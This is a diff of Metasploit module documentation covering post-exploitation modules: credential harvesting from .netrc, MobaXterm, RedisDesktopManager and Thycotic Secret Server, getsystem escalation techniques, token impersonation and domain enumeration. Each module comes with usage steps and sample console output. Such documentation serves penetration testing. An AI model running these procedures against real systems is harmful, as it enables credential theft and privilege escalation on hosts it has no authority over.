+msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type         Information   Connection
+  --  ----  ----         -----------   ----------
+  1         shell linux  SSH ubuntu @  2.2.2.2:39857 -> 1.1.1.1:22 (1.1.1.1)
+
+msf6 auxiliary(scanner/ssh/ssh_login) > use post/multi/gather/netrc_creds
+msf6 post(multi/gather/netrc_creds) > set session 1
+session => 1
+msf6 post(multi/gather/netrc_creds) > run
+
+[*] Reading: /bin/.netrc
+[*] Reading: /dev/.netrc
+[*] Reading: /home/syslog/.netrc
+[*] Reading: /home/ubuntu/.netrc
+[*] Reading: /nonexistent/.netrc
+[*] Reading: /root/.netrc
+[*] Reading: /run/ircd/.netrc
+[*] Reading: /run/sshd/.netrc
+[*] Reading: /run/systemd/.netrc
+[*] Reading: /run/uuidd/.netrc
+[*] Reading: /usr/games/.netrc
+[*] Reading: /usr/sbin/.netrc
+[*] Reading: /var/backups/.netrc
+[*] Reading: /var/cache/man/.netrc
+[*] Reading: /var/cache/pollinate/.netrc
+[*] Reading: /var/lib/gnats/.netrc
+[*] Reading: /var/lib/landscape/.netrc
+[*] Reading: /var/lib/tpm/.netrc
+[*] Reading: /var/lib/usbmux/.netrc
+[*] Reading: /var/list/.netrc
+[*] Reading: /var/mail/.netrc
+[*] Reading: /var/snap/lxd/common/lxd/.netrc
+[*] Reading: /var/spool/lpd/.netrc
+[*] Reading: /var/spool/news/.netrc
+[*] Reading: /var/spool/uucp/.netrc
+[*] Reading: /var/www/.netrc
+
+.netrc credentials
+==================
+
+ Username  Password  Server
+ --------  --------  ------
+ daniel    qwerty    example.com
+ daniel2   qwerty2   example2.com
+
+[*] Credentials stored in: /root/.msf4/loot/20221008103946_default_1.1.1.1_netrc.creds_551386.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,144 @@
+## Vulnerable Application
+This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various techniques.
+
+## Verification Steps
+
+1. Do: `use post/windows/escalate/getsystem`
+2. Do: `set SESSION -1`
+3. Do: `run`
+
+## Options
+
+### TECHNIQUE
+Specify a particular technique to use (1-6), otherwise try them all.
+
+## Techniques
+To be a getsystem technique instead of a local exploit, the technique should meet the following criteria:
+
+* The technique must grant `NT AUTHORITY\SYSTEM`-level privileges through some means
+* The technique must not have a patch either now or anticipated in the future (i.e. it is not a zero-day)
+* The technique must escalate the current process in place and not execute a new payload
+* The technique must not require any user-provided configuration options such as paths, ports, or credentials
+* The technique must be highly reliable and avoid crashing the existing session
+* The technique should work on both 32-bit and 64-bit architectures
+* The technique should affect multiple versions of Windows
+
+### 0 - All Techniques
+The 0 technique will try all techniques, in order, starting at #1 and incrementing until one works.
+
+### 1 - Named Pipe Impersonation
+**Side Effects:** Creates a Service
+**Requirements:** Group: Local Administrators
+**Versions:** Windows XP / Server 2003 and later
+
+This technique is classic named pipe impersonation where by a named pipe is opened on the target and a new service is
+created to connect to it. When started, the service's configured command opens the named pipe as `NT AUTHORITY\SYSTEM`
+which allows the listening process (Meterpreter) to obtain those privileges by calling [ImpersonateNamedPipeClient][1].
+
+### 2 - Named Pipe Impersonation (DLL Dropper Variant)
+**Side Effects:** Creates a Service, Writes to Disk
+**Requirements:** Group: Local Administrators
+**Versions:** Windows XP / Server 2003 and later
+
+This technique is identical to technique #1, but writes a DLL to disk and configures the new service to execute it with
+`rundll32` instead of using a command. When the service is started, `rundll32` will load the DLL which will connect to
+the named pipe, allowing it to be impersonated. The DLL is deleted from disk once the operation is complete.
+
+### 3 - Token Duplication
+**Side Effects:** Injects into Processes
+**Requirements:** Privilege: SeDebugPrivilege
+**Versions:** Windows XP / Server 2003 and later
+
+This technique will enable the `SeDebugPrivilege` privilege then enumerate and iterate over all running services. For each
+running service, Meterpreter will attempt to open the process and reflectively inject a DLL into it. The DLL, once
+injected and running in the context of the service process will check if it is currently running as
+`NT AUTHORITY\SYSTEM` and if so, duplicate it's token to that of the Meterpreter process.
+
+### 4 - Named Pipe Impersonation (RPCSS Variant)
+**Side Effects:** None
+**Requirements:** User: `NT AUTHORITY\NETWORK SERVICE`
+**Versions:** Windows 8.1 / Server 2012 R2 and later
+
+This technique will open a named pipe on the target, connects to and then impersonates itself. Due to how LSASS
+functions if the Meterpreter process is running as `NT AUTHORITY\NETWORK SERVICE`, this can yield the necessary
+privileges to open the RPCSS process which itself contains handles to `NT AUTHORITY\SYSTEM` tokens. Using the access to
+the RPCSS process, one of these tokens is selected and duplicated.
+
+#### References
+
+* https://github.com/sailay1996/RpcSsImpersonator
+* https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
+* https://windows-internals.com/faxing-your-way-to-system/
+
+### 5 - Named Pipe Impersonation (Print Spooler Variant)
+**Side Effects:** None
+**Requirements:** Privilege: SeImpersonatePrivilege
+**Versions:** Windows 8.1 / Server 2012 R2 and later
+
+This technique opens a named pipe on the target and triggers a connection to it via the [MS-RPRN][2] RPC Interface,
+specifically by calling `RpcRemoteFindFirstPrinterChangeNotification`. Once the connection is received, the client is
+impersonated using [ImpersonateNamedPipeClient][1] which elevates the listening process (Meterpreter) to
+`NT AUTHORITY\SYSTEM`.
+
+#### References
+
+* https://github.com/itm4n/PrintSpoofer
+* https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
+
+### 6 - Named Pipe Impersonation (EfsPotato Variant)
+**Side Effects:** None
+**Requirements:** Privilege: SeImpersonatePrivilege
+**Versions:** Windows Vista / Server 2008 and later
+
+This technique opens a named pipe on the target and triggers a connection to it via the [MS-EFSR][3] RPC Interface,
+specifically by calling `EfsRpcEncryptFileSrv`. Once the connection is received, the client is impersonated using
+[ImpersonateNamedPipeClient][1] which elevates the listening process (Meterpreter) to `NT AUTHORITY\SYSTEM`.
+
+#### References
+
+* https://github.com/zcgonvh/EfsPotato
+
+## Scenarios
+
+### Windows 10 x64 21H2 Running As NT AUTHORITY\NETWORK SERVICE
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-81CEH16
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeAssignPrimaryTokenPrivilege
+SeAuditPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeImpersonatePrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > getsystem -t 4
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```
+
+[1]: https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-impersonatenamedpipeclient
+[2]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
+[3]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+  Any Windows host with a `meterpreter` session and MobaXterm v20.6+
+  installed. The following passwords will be searched for and recovered:
+
+### Installation Steps
+
+  1. Download the latest installer of MobaXterm.
+  2. Select default installation
+  3. Open the software and click "Setting" in the toolbar, `General > MobaXterm password management > Master Password setting`
+     complete password setting, add the test account password to the certificate.
+
+## Verification Steps
+
+  1. Get a `meterpreter` session on a Windows host.
+  2. Do: ```run post/windows/gather/credentials/moba_xterm```
+  3. If the system has registry keys for MobaXterm passwords they will be printed out.
+
+## Options
+
+ **MASTER_PASSWORD**
+
+- If you know the password, you can skip decrypting the master password. If not, it will be decrypted automatically
+
+ **CONFIG_PATH**
+
+- Specifies the config file path for MobaXterm
+
+## Scenarios
+
+```
+
+msf6 post(windows/gather/credentials/moba_xterm) > run
+[*] Gathering MobaXterm session information from WIN-79MR8QJM50N
+[!] Parsing is not supported: #84#9%C:\Users\FireEye\Desktop%0%#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24
+%0%1%-1%<none>%%0#0# #-1
+[!] Parsing is not supported: #131#8%0%1009600%3%0%0%1%2%COM2  (ͨ˿ (COM2))#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Color
+s_0_%80%24%0%1%-1%<none>%%0#0# #-1
+[!] Parsing is not supported: #97#10%0%#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1
+[!] Parsing is not supported: #88#3%%0%-1%0%0%0%localhost%7100%1%0%1%0%657%336%0%0#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_
+Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1
+[+] MobaXterm Password
+==================       
+                                                                                                                                                               
+Protocol  Hostname    Username  Password                                                                                                                       
+--------  --------    --------  --------                                                                                                                       
+          mobaserver  mobauser  278804moba14071pass317387                                                                                                      
+                                                                                                                                                               
+[+] MobaXterm Credentials
+=====================
+
+CredentialsName  Username  Password
+---------------  --------  --------
+ftp              1212
+ssh              root      admin
+
+[+] MobaXterm Bookmarks
+===================
+
+BookmarksName  Protocol  ServerHost           Port  Credentials or Passwords
+-------------  --------  ----------           ----  ------------------------
+ftp            ftp       ftp.asdas.com        21    asdas
+msf            telnet    msf                  23    msf
+rdp (rdp)      rdp       rdp                  3389  rdp
+rsh            rsh       rdp.baid.com         rsh   #MobaFont
+sftp           sftp      sftp.asdasd.com      22    asdasd
+ssh            ssh       127.0.0.1            22    [ssh]
+telnet_test    telnet    telnet.kali-team.cn  23    admin
+vnc            vnc       vnc.basbas.com       5900  -1
+
+
+```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+[RedisDesktopManager](https://github.com/uglide/RedisDesktopManager) stores its credentials
+in a JSON file in plaintext. This module allow users who have successfully compromised a machine
+running RedisDesktopManager to extract these credentials from the compromised system so that they can be reused
+for future attacks or for password analysis.
+
+### Setup Steps
+1. Download the latest installer of RedisdDesktopManager from https://github.com/uglide/RedisDesktopManager/releases.
+   However you need to be subscribed to be able to run these editions. Therefore it is recommended that you download the Windows version from https://github.com/lework/RedisDesktopManager-Windows/releases and use these for testing if you don't have an existing Redis subscription.
+2. Run the installer, follow the prompts, and select all the default settings.
+3. Once everything has been installed, start RedisDesktopManager and click on `Connect To Redis Server`.
+4. Click `OK` after filling in the connection information, including the username and password to log into the Redis server as.
+
+## Verification Steps
+1. `msfconsole`
+2. Get a Meterpreter session on a Windows system
+3. `use post/windows/gather/credentials/redis_desktop_manager`
+4. `set SESSION <session number of the Meterpreter session>`
+5. `run`
+6. Verify that the module was able to extract the connection credentials you entered during the `Setup Steps` phrase.
+
+
+## Options
+### REGEX
+Users can set their own regular expressions that will be utilized to
+determine which credentials to extract. The default is set to `^password`.
+
+### VERBOSE
+By default this option is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and will cause the module to save
+the stolen artifacts/files to the loot files on the machine running Metasploit.
+This is required for extracting credentials from files using regexp,
+JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the
+predefined regular expression. The `STORE_LOOT` option must be turned on in
+order for this to work.
+
+## Scenarios
+
@@ -0,0 +1,127 @@
+This module exports and decrypts Secret Server credentials to a CSV file; it is intended as a
+post-exploitation module for Windows hosts with Delinea/Thycotic Secret Server installed. Master
+Encryption Key (MEK) and associated IV values are decrypted from `encryption.config` using a 
+static key baked into the software; there is also support for encryption configs configured with
+Windows DPAPI MachineKey protection. The module contains two actions, `dump` and `export`, the
+former extracts the encrypted Secret Server database and performs decryption, and the latter
+allows the encryption keys and encrypted database to be plundered for later offline decryption
+in situations where expedience is necessary.
+
+This module incorporates original research published by the authors of SecretServerSecretStealer,
+a PowerShell script designed to harvest Secret Server credentials. The GitHub repo for
+SecretStealer.ps1 includes tons of notes on the internals of Secret Server:
+
+https://github.com/denandz/SecretServerSecretStealer
+
+## Vulnerable Application
+This module has been tested against Secret Server versions 8.4 through 11.2, though it may work on
+earlier versions. It is intended to be run after successfully exploiting a Windows host with the
+Delinea/Thycotic Secret Server software installed. The module supports decryption of configuration
+files that have been protected by Windows DPAPI, but does not support extraction of any secrets
+if the system is configured with a Hardware Security Module (HSM).
+
+## Verification Steps
+This is a post module and requires a meterpreter session on the Microsoft Windows server host
+with a configured instance of Delinea/Thycotic Secret Server installed.
+
+1. Start msfconsole
+2. Get session on Secret Server host via method of choice and background it
+3. Do: `use post/windows/gather/credentials/thycotic_secretserver_dump`
+4. Do: `set session <session>`
+5. Do: `dump` to extract and decrypt the Secret Server database, or `export` to extract the encrypted database only
+
+## Options
+
+### SESSION
+
+Which session to use, which can be viewed with `sessions -l`
+
+## Scenarios
+Windows Server 2019 host running Secret Server 11.2 using the `dump` action:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/thycotic_secretserver_dump
+msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > set session 1
+msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > dump
+
+[*] Hostname THYCOTIC IPv4 10.1.0.113
+[*] Decrypt database.config ...
+[+] Secret Server SQL Database Connection Configuration:
+[+]     Instance Name: localhost\SQLEXPRESS
+[+]     Database Name: SecretServer
+[+]     Database User: sa
+[+]     Database Pass: !-TUwX!_-gD-wak-cugyU-0GX0$vL-evYG2
+[*] Secret Server Build 11.22
+[*] Decrypt encryption.config ...
+[+] Secret Server Encryption Configuration:
+[+]        KEY: fc35d1abcade1c180c699e10fbb3efeb
+[+]     KEY256: e768c5223bafa5481faca1ee10b63fb80c699e10ffa694ce29adc66963d05109
+[+]         IV: 2c2df1a68dbc29adc66041bd6e6e4ad3
+[*] Performing export and decryption of Secret Server SQL database
+[*] Export Secret Server DB ...
+[+] 47842 rows exported, 19915 unique SecretIDs
+[+] Encrypted Secret Server Database Dump: /root/.msf4/loot/20220829112535_default_10.1.0.113_thycotic_secrets_288749.txt
+[+] 47842 rows loaded, 19915 unique SecretIDs
+[*] Process Secret Server DB ...
+[-] SecretID 1395 field 'Notes' failed to decrypt
+[-] SecretID 2050 field 'Notes' failed to decrypt
+[-] SecretID 2506 field 'Notes' failed to decrypt
+[-] SecretID 2549 field 'Notes' failed to decrypt
+[-] SecretID 2558 field 'Notes' failed to decrypt
+[-] SecretID 2566 field 'Notes' failed to decrypt
+[-] SecretID 2567 field 'Notes' failed to decrypt
+[-] SecretID 2583 field 'Notes' failed to decrypt
+[-] SecretID 3393 field 'Notes' failed to decrypt
+[-] SecretID 4060 field 'Notes' failed to decrypt
+[!] SecretID 4092 field 'SFTP Site' contains invalid UTF-8 and will be stored as a Base64 string in the output file
+[-] SecretID 4103 field 'Notes' failed to decrypt
+[-] SecretID 4174 field 'Notes' failed to decrypt
+[-] SecretID 4625 field 'Notes' failed to decrypt
+[-] SecretID 5393 field 'Notes' failed to decrypt
+[-] SecretID 5647 field 'Notes' failed to decrypt
+[-] SecretID 6018 field 'Notes' failed to decrypt
+[-] SecretID 6250 field 'Notes' failed to decrypt
+[-] SecretID 6263 field 'Notes' failed to decrypt
+[-] SecretID 6657 field 'Notes' failed to decrypt
+[-] SecretID 9169 field 'Notes' failed to decrypt
+[-] SecretID 10577 field 'Notes' failed to decrypt
+[-] SecretID 10777 field 'Notes' failed to decrypt
+[!] SecretID 11097 field 'Notes' contains invalid UTF-8 and will be stored as a Base64 string in the output file
+[-] SecretID 11319 field 'Notes' failed to decrypt
+[-] SecretID 11973 field 'Notes' failed to decrypt
+[-] SecretID 11974 field 'Notes' failed to decrypt
+[-] SecretID 11997 field 'Notes' failed to decrypt
+[!] 47842 rows processed (26 rows failed)
+[*] 45117 rows recovered: 34479 plaintext, 10638 decrypted (2699 blank)
+[*] 45117 rows written (2699 blank rows withheld)
+[+] 19836 unique SecretID records recovered
+[+] Decrypted Secret Server Database Dump: /root/.msf4/loot/20220829112547_default_10.1.0.113_thycotic_secrets_357639.txt
+[*] Post module execution completed
+msf6 post(multi/gather/thycotic_secretserver_dump) > 
+```
+
+Windows Server 2019 host running Secret Server 11.2 using the `export` action:
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/thycotic_secretserver_dump
+msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > set session 1
+msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > export
+
+[*] Hostname THYCOTIC IPv4 10.1.0.113
+[*] Decrypt database.config ...
+[+] Secret Server SQL Database Connection Configuration:
+[+]     Instance Name: localhost\SQLEXPRESS
+[+]     Database Name: SecretServer_112E
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Secret Server Build 11.22
+[*] Decrypt encryption.config ...
+[+] Secret Server Encryption Configuration:
+[+]        KEY: 376f80b25053d74afcc321837442ddc9
+[+]     KEY256: 5b0f4d7d2d89c180b62c64b881072d4cf2b6fd0487c9d4438050a4734a3ece19
+[+]         IV: d933b2ad66c785891d4bc916cebdde15
+[*] Performing export of Secret Server SQL database to CSV file
+[*] Export Secret Server DB ...
+[+] 3 rows exported, 1 unique SecretIDs
+[+] Encrypted Secret Server Database Dump: /root/.msf4/loot/20220829113427_default_10.1.0.113_thycotic_secrets_175194.txt
+[*] Post module execution completed
@@ -1,7 +1,7 @@
 ## Vulnerable Application

-This module identifies the primary domain via the registry. The registry value used is: 
-`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\DCName`.
+This module identifies the primary Active Directory domain name
+and domain controller.

 ## Verification Steps

@@ -10,34 +10,36 @@ This module identifies the primary domain via the registry. The registry value u
 1. Do: `use post/windows/gather/enum_domain`
 1. Do: `set session [#]`
 1. Do: `run`
-1. You should information on the computer's domain
+1. You should receive Active Directory domain information

 ## Options

 ## Scenarios

-### Windows 2012 DC
+### Windows 2016 with Windows 2008 SP1 DC

 ```
-msf6 post(windows/gather/enum_domain) > sessions -i 6
-[*] Starting interaction with 6...
+msf6 post(windows/gather/enum_domain) > sessions -i 1
+[*] Starting interaction with 1...

 meterpreter > sysinfo
-Computer        : DC1
-OS              : Windows 2012 (6.2 Build 9200).
+Computer        : WIN-7V3NGVNQTJ1
+OS              : Windows 2016+ (10.0 Build 14393).
 Architecture    : x64
 System Language : en_US
-Domain          : hoodiecola
+Domain          : CORP
 Logged On Users : 4
-Meterpreter     : x86/windows
+Meterpreter     : x64/windows
 meterpreter > background
-[*] Backgrounding session 6...
+[*] Backgrounding session 1...
+
 msf6 post(windows/gather/enum_domain) > use post/windows/gather/enum_domain
-msf6 post(windows/gather/enum_domain) > set session 6
-session => 6
+msf6 post(windows/gather/enum_domain) > set session 1
+session => 1
 msf6 post(windows/gather/enum_domain) > run

-[+] FOUND Domain: hoodiecola
-[+] FOUND Domain Controller: dc1 (IP: 1.1.1.1)
+[+] Domain FQDN: corp.local
+[+] Domain NetBIOS Name: CORP
+[+] Domain Controller: WIN-17B09RRRJTG.corp.local (IP: 192.168.200.218)
 [*] Post module execution completed
 ```
@@ -1,12 +1,10 @@
 ## Vulnerable Application

-This module extracts user accounts from specified group and stores 
-the results in the loot. It will also verify if session account is 
-in the group. Data is stored in loot in a format that is compatible 
-with the `token_hunter` plugin. This module should be run over as 
-session with domain credentials.
-
-This information is gathered through the `net groups <domain> /domain` command.
+This module extracts user accounts from the specified domain group
+and stores the results in the loot. It will also verify if session
+account is in the group. Data is stored in loot in a format that
+is compatible with the `token_hunter` plugin. This module must be
+run on a session running as a domain user.

 ## Verification Steps

@@ -14,7 +12,7 @@ This information is gathered through the `net groups <domain> /domain` command.
 1. Get a session on a Windows target which is joined to a domain
 1. Do: `use post/windows/gather/enum_domain_group_users`
 1. Do: `set session [#]`
-1. Do: `set group`
+1. Do: `set group [group]`
 1. Do: `run`
 1. You should get the domain members for the group.

@@ -50,14 +48,14 @@ group => finance
 msf6 post(windows/gather/enum_domain_group_users) > run

 [*] Running module against DC1
-[-] No members found for finance
+[-] Post aborted due to failure: unknown: No members found for 'hoodiecola\finance' group.
 [*] Post module execution completed
 msf6 post(windows/gather/enum_domain_group_users) > set group "quality control"
 group => quality control
 msf6 post(windows/gather/enum_domain_group_users) > run

-[*] Running module against DC1
-[*] Found users in quality control
+[*] Running module against DC1 (1.1.1.1)
+[*] Found 3 users in 'hoodiecola\quality control' group.
 [*]     hoodiecola\rachel
 [*]     hoodiecola\lisa
 [*]     hoodiecola\charles
@@ -0,0 +1,83 @@
+## Vulnerable Application
+
+This module enumerates domain account tokens, processes running under
+domain accounts, and domain users in the local Administrators, Users
+and Backup Operator groups.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a Meterpreter session on a Windows target on a domain
+1. Do: `use post/windows/gather/enum_domain_tokens`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should receive a list of Active Directory domain accounts with impersonation tokens
+
+## Options
+
+## Scenarios
+
+### Local Administrator session on Windows Server 2016
+
+```
+msf6 > use post/windows/gather/enum_domain_tokens
+msf6 post(windows/gather/enum_domain_tokens) > set session 1
+session => 1
+msf6 post(windows/gather/enum_domain_tokens) > run
+
+[*] Running module against WIN-7V3NGVNQTJ1 (192.168.200.215)
+[+] Current session is running under a Local Admin account
+[*] This host is not a domain controller
+[*] Checking local groups for Domain Accounts and Groups
+
+Account in Local Groups with Domain Context
+===========================================
+
+ Local Group       Member              Domain Admin
+ -----------       ------              ------------
+ Administrators    CORP\Domain Admins  false
+ Backup Operators  CORP\asdf           false
+ Users             CORP\Domain Users   false
+
+
+[*] Checking for processes running under domain user
+
+Processes under Domain Context
+==============================
+
+ Process Name  PID   Arch  User            Domain Admin
+ ------------  ---   ----  ----            ------------
+ cmd.exe       3504  x64   CORP\corpadmin  true
+ conhost.exe   4008  x64   CORP\corpadmin  true
+
+
+[*] Checking for Domain group and user tokens
+
+Impersonation Tokens with Domain Context
+========================================
+
+ Token Type  Account Type  Account Name                                 Domain Admin
+ ----------  ------------  ------------                                 ------------
+ Delegation  User          CORP\corpadmin                               true
+ Delegation  Group         CORP\Denied RODC Password Replication Group  false
+ Delegation  Group         CORP\Domain Users                            false
+
+
+[*] Post module execution completed
+msf6 post(windows/gather/enum_domain_tokens) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN-7V3NGVNQTJ1\Administrator
+meterpreter > load incognito
+Loading extension incognito...Success.
+meterpreter > impersonate_token CORP\\corpadmin
+[-] Warning: Not currently running as SYSTEM, not all tokens will be available
+             Call rev2self if primary process token is SYSTEM
+[+] Delegation token available
+[+] Successfully impersonated user CORP\corpadmin
+meterpreter > getuid
+Server username: CORP\corpadmin
+meterpreter >
+```
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module will enumerate Microsoft product license keys.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_ms_product_keys`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows 7 Professional SP1 (x64)
+
+```
+msf6 > use post/windows/gather/enum_ms_product_keys
+msf6 post(windows/gather/enum_ms_product_keys) > set session 1
+session => 1
+msf6 post(windows/gather/enum_ms_product_keys) > run
+
+[*] Finding Microsoft product keys on TEST (192.168.200.190)
+
+Keys
+====
+
+ Product                 Registered Owner  Registered Organization  License Key
+ -------                 ----------------  -----------------------  -----------
+ Windows 7 Professional  Windows User                               N0TMY-K3Y55-N0TMY-K3Y55-N0TMY
+ Windows 7 Professional  Windows User                               N0TMY-K3Y55-N0TMY-K3Y55-N0TMY
+
+
+[+] Product keys stored in: /root/.msf4/loot/20220814092725_default_192.168.200.190_host.ms_keys_579592.txt
+[*] Post module execution completed
+```
@@ -1,59 +1,97 @@
-
 ## Vulnerable Application

-  This module will attempt to enumerate which patches are applied to a
-  Windows system, as well as on which date they were applied, based on
-  the result of the WMI query `SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering`.
+This module enumerates patches applied to a Windows system using the
+WMI query: `SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering`.
+

 ## Verification Steps

-  1. Start msfconsole
-  2. Get meterpreter session
-  3. Do: ```use post/windows/gather/enum_patches```
-  4. Do: ```set SESSION <session id>```
-  5. Do: ```run```
+1. Start msfconsole
+2. Get meterpreter session
+3. Do: `use post/windows/gather/enum_patches`
+4. Do: `set SESSION <session id>`
+5. Do: `run`

 ## Options

-  **KB**
-
-  A comma separated list of KB patches to search for. Default is: `KB2871997, KB2928120`
-
-  **MSFLOCALS**
-
-  Search for missing patches for which there is a MSF local module. Default is `true`.
-
-  **SESSION**
-
-  The session to run this module on.

 ## Scenarios

-### Windows 10 x64 v1909
+### Windows 11 Pro 10.0.22000 Build 22000 x64

-  ```
-  msf6 exploit(multi/handler) > use post/windows/gather/enum_patches
-  msf6 post(windows/gather/enum_patches) > show options
+```
+msf6 post(windows/gather/enum_patches) > set session 1
+session => 1
+msf6 post(windows/gather/enum_patches) > run

-  Module options (post/windows/gather/enum_patches):
+[*] Running module against WINDEV2110EVAL (192.168.200.140)

-    Name     Current Setting  Required  Description
-    ----     ---------------  --------  -----------
-    SESSION                   yes       The session to run this module on.
+Installed Patches
+=================

-  msf6 post(windows/gather/enum_patches) > set SESSION 1
-  SESSION => 1
-  msf6 post(windows/gather/enum_patches) > run
+  HotFix ID  Install Date
+  ---------  ------------
+  KB5009469  2/27/2022
+  KB5009641  2/26/2022
+  KB5011493  3/5/2022

-  [*] Patch list saved to /home/gwillcox/.msf4/loot/20200902125729_default_172.29.215.21_enum_patches_495652.txt
-  [+] KB4569751 installed on 8/17/2020
-  [+] KB4497165 installed on 8/17/2020
-  [+] KB4517245 installed on 4/10/2020
-  [+] KB4537759 installed on 4/10/2020
-  [+] KB4552152 installed on 4/10/2020
-  [+] KB4561600 installed on 8/17/2020
-  [+] KB4569073 installed on 8/17/2020
-  [+] KB4565351 installed on 8/17/2020
-  [*] Post module execution completed
-  msf6 post(windows/gather/enum_patches) >
-  ```
+[*] Patch list saved to /root/.msf4/loot/20220911234321_default_192.168.200.140_enum_patches_485106.txt
+[*] Post module execution completed
+```
+
+### Windows 7 SP1 x64
+
+```
+msf6 post(windows/gather/enum_patches) > set session 1
+session => 1
+msf6 post(windows/gather/enum_patches) > run
+
+[*] Running module against TEST (192.168.200.190)
+
+Installed Patches
+=================
+
+  HotFix ID  Install Date
+  ---------  ------------
+  KB2533623  3/29/2019
+  KB2534111  2/1/2016
+  KB2639308  3/29/2019
+  KB2670838  3/29/2019
+  KB2729094  3/29/2019
+  KB2731771  3/29/2019
+  KB2786081  3/29/2019
+  KB2834140  3/29/2019
+  KB2841134  3/29/2019
+  KB2849696  3/29/2019
+  KB2849697  3/29/2019
+  KB2882822  3/29/2019
+  KB2888049  3/29/2019
+  KB2999226  9/4/2017
+  KB958488   5/26/2017
+  KB976902   11/21/2010
+
+[*] Patch list saved to /root/.msf4/loot/20220911233948_default_192.168.200.190_enum_patches_697182.txt
+[*] Post module execution completed
+```
+
+### Windows XP SP3 x86
+
+```
+msf6 post(windows/gather/enum_patches) > set session 1
+session => 1
+msf6 post(windows/gather/enum_patches) > run
+
+[*] Running module against WINXP (192.168.200.164)
+
+Installed Patches
+=================
+
+  HotFix ID  Install Date
+  ---------  ------------
+  KB811113   4/5/2013
+  KB936929   4/5/2013
+  Q147222
+
+[*] Patch list saved to /root/.msf4/loot/20220911233635_default_192.168.200.164_enum_patches_552914.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,172 @@
+## Vulnerable Application
+
+This module will query the system for services and return the display name and
+configuration info for each returned service. You can also optionally
+filter the results by using query strings to match on specific
+credentials, paths, or start types and only return the results that match.
+These query operations are cumulative and if no query strings are specified,
+the module will just return all services. NOTE: If the script hangs,
+Windows Defender Firewall is most likely on and you did not migrate
+to a safe process (explorer.exe for example).
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_services`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+### CRED
+
+String to search returned service credentials for.
+
+### PATH
+
+String to search returned service paths for.
+
+### TYPE
+
+Service startup types to display (`All`, `Auto`, `Manual`, `Disabled`) (default: `All`)
+
+## Scenarios
+
+### Windows Server 2008 SP1 (x64)
+
+```
+msf6 > use post/windows/gather/enum_services
+msf6 post(windows/gather/enum_services) > set session 1
+session => 1
+msf6 post(windows/gather/enum_services) > run
+
+[*] Listing Service Info for matching services, please wait...
+[+] New service credential detected: AeLookupSvc is running as 'localSystem'
+[+] New service credential detected: ALG is running as 'NT AUTHORITY\LocalService'
+[+] New service credential detected: CryptSvc is running as 'NT Authority\NetworkService'
+[*] Found 114 Windows services matching filters
+
+Services
+========
+
+ Name                            Credentials                  Command   Startup
+ ----                            -----------                  -------   -------
+ ALG                             NT AUTHORITY\LocalService    Manual    C:\Windows\System32\alg.exe
+ AeLookupSvc                     localSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ AppMgmt                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ Appinfo                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
